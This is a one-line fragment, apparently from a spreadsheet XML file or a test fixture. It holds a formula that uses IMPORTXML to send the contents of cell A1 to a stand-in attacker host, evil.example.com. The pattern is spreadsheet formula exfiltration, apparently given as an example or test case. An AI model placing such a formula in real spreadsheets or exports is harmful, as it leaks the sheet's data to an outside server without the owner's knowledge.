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>
        <f>IMPORTXML("https://evil.example.com/x?d="&amp;A1,"//a")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